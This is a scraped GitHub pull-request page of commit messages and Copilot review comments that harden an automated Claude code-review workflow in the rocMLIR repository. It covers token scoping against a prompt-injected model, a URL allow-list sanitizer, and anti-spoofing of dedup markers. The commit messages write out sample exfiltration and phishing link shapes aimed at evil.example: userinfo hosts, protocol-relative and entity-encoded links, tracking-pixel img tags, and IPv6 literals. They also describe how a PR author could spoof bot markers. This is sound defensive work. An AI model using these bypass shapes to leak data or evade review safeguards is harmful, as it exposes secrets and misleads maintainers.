  • The dedup gate treats any latest marker-tagged Claude reply as if it were an earlier resolve reply, but the latest Claude reply may be a prior clarify. In that common flow (developer replied, Claude clarified while the issue still existed, then the developer fixes the code without adding another reply), the fresh finding disappears and this branch skips instead of emitting the first resolve/resolve_with_reaction. Track the reply type/content separately so only an existing resolved reply suppresses resolution.
    **Dedup gate** (applies to both A and B): if `prev_comment.claude_replies` is
    non-empty AND `prev_comment.latest_reply_is_claude` is `true`, we already posted a
    resolve reply on a previous run and no new human activity has occurred since.
    **Skip silently** to avoid posting a duplicate "Resolved" reply on every rerun.

Comment thread .github/workflows/claude_auto_review.yml
Comment thread .github/workflows/claude_auto_review.yml Outdated
Comment thread .claude/skills/update-pr-review/SKILL.md Outdated
Comment thread .claude/skills/review-rocmlir-pr/SKILL.md Outdated
Comment thread .github/scripts/sanitize_claude_actions.sh
Comment thread .github/workflows/claude_auto_review_perimeter_banner.yml Outdated
umangyadav and others added 5 commits May 15, 2026 21:01
Replaces every secrets.GITHUB_TOKEN-driven gh/git API call with a
short-lived (1h) installation token minted in-job via
actions/create-github-app-token@bcd2ba4
(v3.2.0, SHA-pinned) using ROCMLIR_PR_REVIEWER_APP_ID +
ROCMLIR_PR_REVIEWER_PRIVATE_KEY.

Bot identity:
- All comments / replies / reactions now post under
  rocmlir-pr-reviewer[bot] (was: github-actions[bot]).
- Centralized in workflow-level `env: BOT_LOGIN` in
  claude_auto_review.yml; mirrored in:
    * claude-code-action's `allowed_bots` input (uses ${{ env.BOT_LOGIN }})
    * the prompt's bot-identity rules
    * perimeter-banner's `EXPECTED_AUTHOR`
    * the literal in update-pr-review/SKILL.md and review-rocmlir-pr/SKILL.md
  If the App's slug ever changes (`gh api /apps/<slug>`), update those
  five locations.

Default-token permissions minimized:
- review job: contents:read only (was: + pull-requests:read + checks:read)
- post job:   contents:read only (was: + pull-requests:write)
- cleanup:    permissions: {} (was: issues:write)
- perimeter-banner detect: permissions: {} (was: pull-requests:write +
  issues:write)
- fork-notify notify-fork-pr: permissions: {} (was: pull-requests:write +
  issues:write)
A prompt-injected Claude can no longer escalate via the default token --
the default token has no write capability anywhere; the App token is what
authenticates writes, is minted per-job, and is never propagated into
claude-code-action's environment.

Marker rationale rewritten:
The hidden HTML marker is kept (post_claude_review.sh, both skills, the
prompt) but its purpose changed from "filter out other workflows
sharing the github-actions[bot] identity" to "distinguish OUR own
resolve/clarify replies from human replies on the same thread, so the
update-pr-review skill's dedup gate works correctly". With a unique App
identity, author-only filtering would technically suffice, but the
marker remains for that internal-thread-state purpose plus migration
hygiene.

Documentation:
- SECURITY MODEL block in claude_auto_review.yml updated to describe the
  App token model.
- fork-notify file-header revised (no longer references
  GITHUB_TOKEN-downgrade behavior).
- update-pr-review SKILL.md and review-rocmlir-pr SKILL.md updated to
  filter on rocmlir-pr-reviewer[bot] and explicitly tell the model NOT
  to match on the legacy github-actions[bot] identity.
- post_claude_review.sh's required-env docstring documents the App
  token.

Verification:
- bash -n + yaml.safe_load on all touched files: clean.
- Structural assertions: every GH_TOKEN sourced from
  steps.app-token.outputs.token, every Generate-App-token step
  SHA-pinned and ordered before its first GH_TOKEN consumer, no
  leftover secrets.GITHUB_TOKEN, every author-filter location uses the
  new identity, every default-token permission block is contents:read
  or {}.
- Existing sanitizer + 422 fixture suites: pass (no regression --
  no logic changes outside identity / token plumbing).

Required repo configuration before this can run end-to-end:
- App `rocMLIR-PR-Reviewer` installed on ROCm/rocMLIR with
  pull-requests:write + issues:write + metadata:read installation
  permissions.
- Repository secrets ROCMLIR_PR_REVIEWER_APP_ID +
  ROCMLIR_PR_REVIEWER_PRIVATE_KEY configured.

Co-authored-by: Cursor <cursoragent@cursor.com>
- workflow_dispatch ref gate: require github.ref == default_branch on the
  dispatch path. workflow_dispatch runs the YAML from the SELECTED ref,
  not from default; without this gate, dispatching a PR branch would run
  the PR-controlled workflow with full LLM Gateway secrets, defeating
  the perimeter check (which is intentionally disabled on dispatch).
- Pre-fetch derives meta.files from the same pinned `git diff
  origin/<base>...HEAD` ref range that produces diff.patch, so the file
  list the review skill consumes never disagrees with the workspace +
  diff if a force-push lands during the run.
- Prompt example schema: side is "RIGHT" (was "RIGHT|LEFT"), with an
  explicit RIGHT-only enforcement note so a model following the prompt
  cannot emit a value the json-schema validator rejects.
- update-pr-review skill: distinguish resolve vs clarify in claude
  replies (kind = "resolve" iff body starts with the canned `Resolved
  -- addressed in this revision.` prefix). Refines the dedup gate per
  scenario and adds an explicit regression branch in Scenario D so a
  finding that returns after a previous Resolved reply now emits a
  clarify call-out instead of being silently swallowed.
- review-rocmlir-pr skill: inputs table reflects the actual sources
  (local git diff for diff.patch; locally-derived files array in
  meta.json) instead of the historical gh pr diff / gh pr view --json
  files commands.
- sanitize_claude_actions.sh: enforce a strict URL allow-list in actions
  output (github.com / *.github.com / *.githubusercontent.com only).
  Blocks phishing URLs, click-trackers, typosquats, and URL-shaped
  exfil that the existing fixed-string ANTHROPIC_BASE_URL check left
  open. Tighten the prompt's Hard constraints block to match.
- perimeter-banner: stop swallowing label-removal failures. Mirror the
  cleanup job's gh api --method DELETE + selective HTTP 404 pattern so
  auth/rate/network failures fail the workflow loudly instead of
  leaving stale modifies-ci-paths state on the PR.

Verified: yaml parses on all touched workflows; bash -n on every run:
body and on the sanitizer; structural assertions for each fix; 11/11
URL allow-list sanitizer fixtures (github.com pass, anthropic.com /
phishing / typosquat / port / inline body / clarify / uppercase scheme
all rejected; github.com:443 still passes).

Co-authored-by: Cursor <cursoragent@cursor.com>
Closes a security bypass in the URL allow-list sanitizer, hardens the
post/update dedup contract against marker spoofing, and addresses four
new Copilot comments (one Layer-3 fail-open, three doc inconsistencies).

URL allow-list bypass (sanitize_claude_actions.sh)
--------------------------------------------------
Two ways the previous allow-list could be bypassed:

  1. Userinfo authority: `https://github.com@evil.example/path` parsed
     as host=`github.com` by the old regex, but the actual host an HTTP
     client resolves is `evil.example` (RFC 3986 authority is
     `[userinfo@]host[:port]`). Passed the allow-list, hit a phishing
     site.

  2. Markdown link destinations the bare-URL regex ignored:
     `[click](//evil.example/path)` (protocol-relative, inherits the
     viewer's scheme), and non-http(s) schemes like `mailto:`, `ftp:`,
     `javascript:`, `data:`, `file:`, `vbscript:`.

Fixes:
  - Layer 1 (bare URLs) now strips userinfo before host extraction and
    lowercases the host once at the top so casing variants
    (`HTTPS://Github.com/...`) don't slip past.
  - Layer 2 scans Markdown inline `[t](dest)` and reference-style
    `[t]: dest` destinations, rejecting protocol-relative destinations
    to disallowed hosts and any non-http(s) scheme.
  - In-repo paths (`mlir/lib/Foo.cpp`) and fragment anchors (`#x`) are
    untouched -- they have no scheme/authority and are safe.

Marker-spoofing hardening (sanitizer + post script + skills)
------------------------------------------------------------
Dedup correctness depends on `<!-- claude-pr-review-* -->` markers
being unforgeable from model output. Two changes:

  - `sanitize_claude_actions.sh`: any `<!-- claude-pr-review-` literal
    in summary / inline / thread bodies fails the build (exit 1). Stops
    a malicious diff from injecting a marker that would later confuse
    `update-pr-review`'s "is this our reply?" check.
  - `post_claude_review.sh`: new `with_marker_and_action()` helper
    appends the dedup marker AND a sub-marker (`action:resolve` /
    `action:clarify`) on every reply we post. `update-pr-review`'s
    SKILL.md is updated to read intent from the sub-marker, not the
    body prefix -- so a human edit of the visible body can't flip a
    "resolve" reply into a "clarify" for dedup purposes.
  - meta.json bookkeeping in the skill is updated to match.

Copilot review batch 4 (4 new comments)
---------------------------------------
1. Layer-3 perimeter guard fail-open (claude_auto_review.yml):
   The `git diff ... | grep ... || true` single pipeline meant a
   `git diff` failure (bad ref, missing origin/<default>, repo
   corruption) was silently masked by the trailing `|| true` -- even
   with pipefail, the explicit `|| true` swallows the pipeline exit
   and `perimeter_changes` ends up empty, passing the gate. Split
   into a separate `diff_output=\$(git diff ...)` statement so set -e
   aborts on diff failure, keeping `|| true` only on the grep where
   "no perimeter file matched" is the safe case.

2. claude_auto_review_perimeter_banner.yml header staleness:
   - Replaced the `gh pr edit --remove-label` mention with the actual
     `gh api --method DELETE .../labels/modifies-ci-paths` call (the
     Copilot batch 3 commit moved to the API form for selective 404
     handling).
   - Replaced the stale "permissions: pull-requests: write + issues:
     write only" line with the current `permissions: {}` default-deny
     + rocMLIR-PR-Reviewer App installation token model.

3. update-pr-review/SKILL.md Step 3 rules vs the regression branch:
   The Copilot batch 3 commit added a Scenario D regression sub-case
   (previously-resolved thread sees the same finding return -> emit a
   `clarify` thread_update). The Step-3 rules still said "Scenario D
   emits no entry", contradicting the new logic. Updated both rules
   to call out the regression sub-case explicitly: thread_updates
   includes Scenario A/B/C plus Scenario D's regression sub-case;
   Scenario D's non-regression case still emits nothing; inline_comments
   never includes any of those.

4. review-rocmlir-pr/SKILL.md Rules section URL contract:
   Skill said "no URL in any output field", but the workflow prompt
   and sanitizer permit github.com / *.github.com /
   *.githubusercontent.com URLs. Aligned the skill's rule with the
   prompt + sanitizer (allow-list, plus explicit bans on non-http(s)
   schemes, protocol-relative destinations, marker-prefix spoofing,
   userinfo-bypass forms) so the model and the sanitizer agree.

Verification
------------
- All 3 workflow YAMLs parse via PyYAML.
- All `run:` step bodies pass `bash -n`.
- `sanitize_claude_actions.sh` and `post_claude_review.sh` pass `bash -n`.
- Sanitizer fixture suite: 31/31 pass, covering original allow-list (11),
  case-fix + marker-spoofing (5), URL-bypass (13), and ref-style
  Markdown links (2).
- Structural assertions verify all 4 new Copilot fixes are present.

Co-authored-by: Cursor <cursoragent@cursor.com>
…anitizer

Installed actionlint v1.7.7 + shellcheck v0.10.0 locally and ran them on
the three Claude workflows and the standalone sanitizer/post scripts.
Native actionlint was already clean; the integrated shellcheck pass and
the standalone shellcheck pass surfaced 4 minor findings (one style,
three info severity). Addressing them so the existing code stays green
when actionlint is wired into CI.

claude_auto_review.yml (Layer-3 perimeter step)
-----------------------------------------------
SC2001 (style) on `echo "$perimeter_changes" | sed 's/^/  /'`:
shellcheck suggests `${var//search/replace}`, but bash parameter
expansion does literal-string substitution and cannot match the regex
anchor `^`. The bash equivalent for "indent every line by 2 spaces"
would be the awkward, error-prone `"  ${perimeter_changes//$'\n'/$'\n'  }"`.
Added a targeted `# shellcheck disable=SC2001` directive with a
justification explaining why sed is the right tool here -- this is a
textbook SC2001 false positive (the warning is "style" severity
precisely because shellcheck knows the substitution can't always be
done).

sanitize_claude_actions.sh
--------------------------
SC1091 (info) on `source "$(dirname "$0")/secret_patterns.sh"`:
The existing `# shellcheck source=secret_patterns.sh` directive was
being resolved relative to CWD instead of next to the script when
shellcheck was invoked with a relative file path (`-x .github/scripts/
sanitize_claude_actions.sh`). Added the `# shellcheck source-path=
SCRIPTDIR` magic anchor (supported since shellcheck 0.7.0) so the
`source=` lookup is always relative to the sourcing script's directory
regardless of CWD.

SC2018/SC2019 (info) on `tr 'A-Z' 'a-z'` at lines 338 and 381:
Replaced both with the POSIX-class form `tr '[:upper:]' '[:lower:]'`.
For ASCII URL hosts (which is what we lowercase here -- IDN/Unicode
hostnames are punycoded before resolution) this is functionally
equivalent, but the POSIX class form is the documented portable
shellcheck-blessed spelling.

Verification
------------
- `actionlint -shellcheck=shellcheck` on all 3 Claude workflows: exit 0.
- `shellcheck -x` on `sanitize_claude_actions.sh` and `post_claude_review.sh`:
  exit 0.
- Sanitizer fixture suite: still 31/31 pass after the `tr` change.

Co-authored-by: Cursor <cursoragent@cursor.com>
Two Major findings against the previous URL allow-list and dedup
hardening: raw HTML href/src attributes still rendered as live links and
bypassed the bare-URL + Markdown allow-list, and the dedup logic was
trusting marker presence over reply authorship -- letting a PR author
spoof a "Claude reply" by pasting the marker into a thread.

Sanitizer (sanitize_claude_actions.sh)
--------------------------------------
HTML entity decoding pre-pass:

GitHub's markdown renderer entity-decodes link destinations, href/src
attribute values, and bare-URL auto-link targets before resolving them
in the browser. So a model output of `https&#x3A;//evil.example/x`,
`[click](&#x2F;&#x2F;evil.example/x)`, or `<a href="&#x2F;&#x2F;evil
.example/x">click</a>` would render as a live link to evil.example yet
sail past any literal-bytes pattern check. Added a pre-pass that
HTML-entity-decodes all model-supplied strings via Python's
`html.unescape` (handles named, decimal, and hex entities per WHATWG)
into a `$strings_decoded_tmp` view; Layers 1, 2, and 3 all read from it.
Decoding only ADDS matches (a bypass-encoded URL becomes a plain URL
after decode), never removes them, so this is a strict strengthening.
The marker-prefix anti-spoof check still runs against the raw bytes
because the comment `body` GitHub stores -- and that update-pr-review
later string-matches against -- is the raw bytes too; an entity-encoded
marker never reaches update-pr-review's matcher in decoded form.

Layer 3: HTML attribute scan (href= / src=):

GitHub renders a sanitized subset of raw HTML inside markdown comments,
notably `<a href="...">` and `<img src="...">`. That gave the model
output four bypass shapes that Layers 1 and 2 missed:
  - `<a href="//evil.example/x">click</a>` (proto-relative href)
  - `<a href="https://evil.example/x">click</a>` (bare http(s) href --
    Layer 1 already caught the substring after the entity-decode
    pre-pass; Layer 3 makes the rejection attribute-aware so the error
    message points at the real shape)
  - `<a href="mailto:test@example.com">click</a>` (and ftp://, file://;
    javascript:/data: are mostly stripped by GH's renderer but the
    pipeline has zero use for any of them)
  - `<img src="//evil.example/track.png">` (tracking pixel / exfil)
Layer 3 extracts the destination of every href= and src= attribute
(double-quoted, single-quoted, or unquoted; case-insensitive HREF/SRC
matched too) and runs the Layer-2 scheme/host checks against them. Only
href and src are scanned -- other URL-bearing HTML attributes (action,
formaction, srcset, xlink:href) are not in GitHub's HTML allow-list for
comments so they are stripped before render.

Workflow prompt + review-rocmlir-pr/SKILL.md
--------------------------------------------
Extended the prompt's Hard constraints block and the review skill's
Rules section to spell out the new HTML attribute and entity-encoding
rejections so the model is told the same contract the sanitizer
enforces.

update-pr-review/SKILL.md (Major: marker-spoof)
-----------------------------------------------
Previously the skill defined "Claude reply" purely as "any reply whose
body contains the marker", with explicit rationale for excluding the
author check. That made PR-author replies a trust source: a PR author
could paste

    <!-- claude-pr-review-marker:v1 --> <!-- claude-pr-review-action:resolve -->

into a reply, and update-pr-review would classify it as one of OUR
previous resolve replies. The Step-2 dedup gate would then conclude we
already resolved this thread on a previous run with no human activity
since, and silently drop a real regression flagged by the next review
run. The marker-only check also misclassified the fake reply for the
Scenario D regression branch.

Now the "Claude (marker-tagged) replies" definition requires BOTH
`user.login == "rocmlir-pr-reviewer[bot]"` AND the marker. The author
check is the trust boundary; the marker remains required so we can
still tell OUR resolve/clarify replies apart from a hypothetical
genuine bot reply via a future workflow that someday installs the same
App identity but does not write our marker. "Human replies" is now
defined as "any reply that is NOT a Claude reply", which by construction
includes spoofed-marker replies from non-bot authors -- those flow
through the regular human-replies path where they are explicitly
allowed to nudge the dedup gate.

Verification
------------
- `actionlint -shellcheck=…` on all 3 workflows: exit 0.
- `shellcheck -x` on `sanitize_claude_actions.sh` and
  `post_claude_review.sh`: exit 0.
- Sanitizer fixture suite: 43/43 pass:
  - 16 regression cases (URL allow-list, marker spoof, Markdown bypass,
    case-insensitive scheme, in-repo paths, fragment anchors).
  - 14 NEW href= cases (proto-rel evil, bare https evil, mailto,
    javascript, ftp, data, file, single-quoted, unquoted, spaces around
    `=`, uppercase HREF, github.com pass, proto-rel github pass,
    fragment pass).
  - 4 NEW img src= cases (proto-rel evil, https evil, data: uri,
    githubusercontent.com pass).
  - 7 NEW entity-encoding cases (bare URL, Markdown destination, href
    proto-rel, href mailto, lt/gt-encoded full <a> tag, decimal
    entities, github.com decoded pass).
  - 2 NEW nested-field cases (href in inline body, href in clarify
    body) confirming all extraction layers see deeply nested fields.

Co-authored-by: Cursor <cursoragent@cursor.com>
Major (Layer-1 bypass): bare `https://[::1]/x`, Markdown
`[click](https://[::1]/x)`, and HTML `<a href="https://[::1]/x">`
all passed the URL allow-list. Same shape with any IPv6 / IPvFuture /
IPv4-mapped literal in the bracketed-host position bypassed every
existing check.

Why every existing layer missed it
----------------------------------
- Layer 1 (bare URL host check): the grep pattern is
  `https?://[A-Za-z0-9._~:@/-]+`, and `[` is NOT in that character
  class. The `+` quantifier requires at least one match after `://`,
  the next byte is `[`, grep simply doesn't match. Layer 1 never
  even sees the URL.
- Layer 2a / 3a (non-http(s) scheme in Markdown / HTML attr): doesn't
  fire because the scheme IS `https:` (or absent for proto-relative).
- Layer 2b / 3b (protocol-relative): the `^//[^/?#]+` extraction does
  catch `[click](//[::1]/x)` and `<a href="//[::1]/x">` (the
  bracketed authority lands in the host check and fails the
  allow-list), but `https://[::1]/x` has an explicit scheme so this
  rule doesn't apply -- and an attacker would just use that form.

Layer 4: bracketed-IP-literal hosts (categorical rejection)
-----------------------------------------------------------
RFC 3986 §3.2.2 defines the host component as either reg-name or
IP-literal (`"[" ( IPv6address / IPvFuture ) "]"`). Bracketed
authorities are now categorically rejected -- no host-allow-list
classification is possible (you can't tell from `[2606:50c0:8000::153]`
whether it points at GitHub Pages or an attacker's host that happens
to have pinned the same address) and there's no legitimate use case
in a code-review body anyway: github.com / gist.github.com / etc. are
never reached via raw IP literal.

Single regex `(https?:)?//\[[^]]+\]` covers every bypass shape in one
content-agnostic pass:
  - bare URL          : https://[::1]/x
  - Markdown dest     : [click](https://[::1]/x), [click](//[::1]/x)
  - HTML href / src   : <a href="https://[::1]/x">,
                        <a href="//[::1]/x">,
                        <img src="//[fe80::1]/track.png">
  - IPvFuture         : https://[v1.fe80::a+en1]/x
  - IPv4-mapped IPv6  : https://[::ffff:1.2.3.4]/x
  - entity-encoded    : https://&#x5B;::1&#x5D;/x  (entity-decoded
                        before this layer runs)

The `//` immediately preceding `[` is the discriminator: a bracketed
segment in a URL PATH (e.g. `https://github.com/foo/[::1]/bar`) does
NOT match because the bracket is not in authority position. Verified.

Prompt + review-rocmlir-pr/SKILL.md
-----------------------------------
Both updated to call out the bracketed-IP-literal rejection in the
same "Hard constraints" / "Rules" rejection list as the other URL
shapes, so the model is told the same contract the sanitizer enforces.

Verification
------------
- `actionlint -shellcheck=…` on all 3 workflows: exit 0.
- `shellcheck -x` on `sanitize_claude_actions.sh` and
  `post_claude_review.sh`: exit 0.
- Sanitizer fixture suite: 43/43 pass:
  - 20 NEW bracketed-host cases (bare URL, Markdown inline + ref-style,
    HTML href in 4 quoting forms, HTML img src, IPv6 loopback / link-
    local / GUA / port / uppercase scheme, IPvFuture, IPv4-mapped,
    entity-encoded brackets in hex and decimal, deep-nested in inline
    + clarify bodies).
  - 5 NEW negative cases (github.com normal, githubusercontent normal,
    brackets in URL PATH not host, prose `[::1]` mention, bare literal
    `[::1]`) to confirm no false positives.
  - 18 regression cases (URL allow-list, marker spoof, Markdown bypass,
    HTML href bypass, entity encoding, scheme case, in-repo paths,
    fragment anchors).

Co-authored-by: Cursor <cursoragent@cursor.com>
Copy link
Copy Markdown
Contributor

Copilot AI left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Copilot reviewed 9 out of 10 changed files in this pull request and generated 7 comments.

Comments suppressed due to low confidence (5)

.github/scripts/sanitize_claude_actions.sh:465

  • Protocol-relative Markdown destinations are logged verbatim after extracting the host. Since the host itself can contain encoded sensitive data, this can turn a blocked URL-shaped exfiltration attempt into a log leak. Redact the reported host instead of printing model-supplied URL components directly.
if [[ -n "$bad_proto_rel" ]]; then
  echo "::error::actions.json contains protocol-relative Markdown link destinations to disallowed hosts:"
  printf '%s\n' "$bad_proto_rel" | head -10 | sed 's/^/  - /'
  echo "::error::Protocol-relative destinations (//host/...) resolve to the page's protocol; on a github.com page, //evil.example/x becomes https://evil.example/x. Only //github.com/... (and *.github.com / *.githubusercontent.com) is allowed."

.github/scripts/sanitize_claude_actions.sh:533

  • This protocol-relative href=/src= error path logs model-supplied hosts directly. Hosts can contain encoded secret material, so the sanitizer can still leak data to Actions logs while rejecting the payload. Redact or truncate the reported host values.
if [[ -n "$attr_bad_proto_rel" ]]; then
  echo "::error::actions.json contains protocol-relative href= or src= attributes to disallowed hosts:"
  printf '%s\n' "$attr_bad_proto_rel" | head -10 | sed 's/^/  - /'
  echo "::error::Protocol-relative href/src (//host/...) resolves to the page's protocol; on a github.com page, //evil.example/x becomes https://evil.example/x. Only //github.com/... (and *.github.com / *.githubusercontent.com) is allowed."

.github/scripts/sanitize_claude_actions.sh:391

  • The URL check strips userinfo before applying the host allow-list, but it does not reject URLs that contain userinfo. As a result, https://<secret>@github.com/... passes because the remaining host is allow-listed, and the secret-bearing URL would be posted in the PR comment. Treat any authority containing userinfo (@ before the host) as invalid instead of only stripping it for host comparison.
disallowed_hosts=$(grep -oiE 'https?://[A-Za-z0-9._~:@/-]+' "$strings_decoded_tmp" \
  | tr '[:upper:]' '[:lower:]' \
  | sed -E 's|^https?://([^/?#]+).*|\1|' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \

.github/scripts/sanitize_claude_actions.sh:460

  • Protocol-relative Markdown destinations also strip userinfo before allow-listing, so //<secret>@github.com/path is accepted as a GitHub URL even though the posted destination contains the secret-bearing userinfo. Reject destinations whose authority contains @ rather than only stripping that prefix for host comparison.
bad_proto_rel=$(printf '%s\n' "$md_dests" \
  | grep -oE '^//[^/?#]+' \
  | sed -E 's|^//||' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \
  | sort -u \
  | grep -vE "$ALLOWED_HOST_RE" \

.github/scripts/sanitize_claude_actions.sh:528

  • The protocol-relative href=/src= check accepts //<secret>@github.com/... because it strips userinfo before checking the host. Since the original attribute value is what would be posted/rendered, this allows secret material in userinfo to bypass the sanitizer. Reject userinfo-bearing attribute destinations outright.
attr_bad_proto_rel=$(printf '%s\n' "$attr_dests" \
  | grep -oE '^//[^/?#]+' \
  | sed -E 's|^//||' \
  | sed -E 's|.*@||' \
  | sed -E 's|:[0-9]+$||' \
  | sort -u \
  | grep -vE "$ALLOWED_HOST_RE" \

Comment on lines +387 to +393
disallowed_hosts=$(grep -oiE 'https?://[A-Za-z0-9._~:@/-]+' "$strings_decoded_tmp" \
| tr '[:upper:]' '[:lower:]' \
| sed -E 's|^https?://([^/?#]+).*|\1|' \
| sed -E 's|.*@||' \
| sed -E 's|:[0-9]+$||' \
| sort -u \
| grep -vE "$ALLOWED_HOST_RE" \
Comment on lines +395 to +398
if [[ -n "$disallowed_hosts" ]]; then
echo "::error::actions.json contains URLs to disallowed hosts:"
printf '%s\n' "$disallowed_hosts" | head -10 | sed 's/^/ - /'
echo "::error::Only github.com (and *.github.com / *.githubusercontent.com) URLs are allowed in review bodies. See the URL allow-list in sanitize_claude_actions.sh and the matching contract in the prompt's Hard constraints block in .github/workflows/claude_auto_review.yml."
Comment on lines +444 to +447
if [[ -n "$bad_scheme" ]]; then
echo "::error::actions.json contains Markdown link destinations with non-http(s) schemes:"
printf '%s\n' "$bad_scheme" | head -10 | sed 's/^/ - /'
echo "::error::Only http(s)://github.com URLs (allow-listed by Layer 1), in-repo paths, and fragment anchors are valid link destinations. mailto:, ftp:, javascript:, data:, file:, vbscript: etc. are rejected."
Comment on lines +513 to +516
if [[ -n "$attr_bad_scheme" ]]; then
echo "::error::actions.json contains href= or src= attributes with non-http(s) schemes:"
printf '%s\n' "$attr_bad_scheme" | head -10 | sed 's/^/ - /'
echo "::error::Only http(s)://github.com (and *.github.com / *.githubusercontent.com) URLs are valid href/src destinations. mailto:, ftp:, javascript:, data:, file:, vbscript: etc. are rejected."
Comment on lines +215 to +217
# Secret/credential pattern scan over every string in the document. Patterns are
# defined in secret_patterns.sh.
hits=$(jq -r '[.. | strings] | .[]' "$ACTIONS_FILE" \

## Step 3 -- Output schema

Return a single JSON object with two arrays AS YOUR FINAL RESPONSE. The workflow uses
Comment on lines +882 to +892
# - conditional thread-update field requirements (e.g. resolve_with_reaction
# needs human_reply_id, clarify needs body)
# - secret/credential pattern scan over every string
# - LLM-Gateway env-var-name scan
#
# Runs from the workspace path; Claude has no Write, so the overlaid script
# cannot have been tampered with mid-job.
- name: Sanitize actions.json
id: sanitize
# Pass ANTHROPIC_BASE_URL into the sanitizer step so it can
# scan for the LITERAL URL value (not just the env var name)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

claude-review Trigger automated PR review by claude[bot]; auto-removed after the run.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants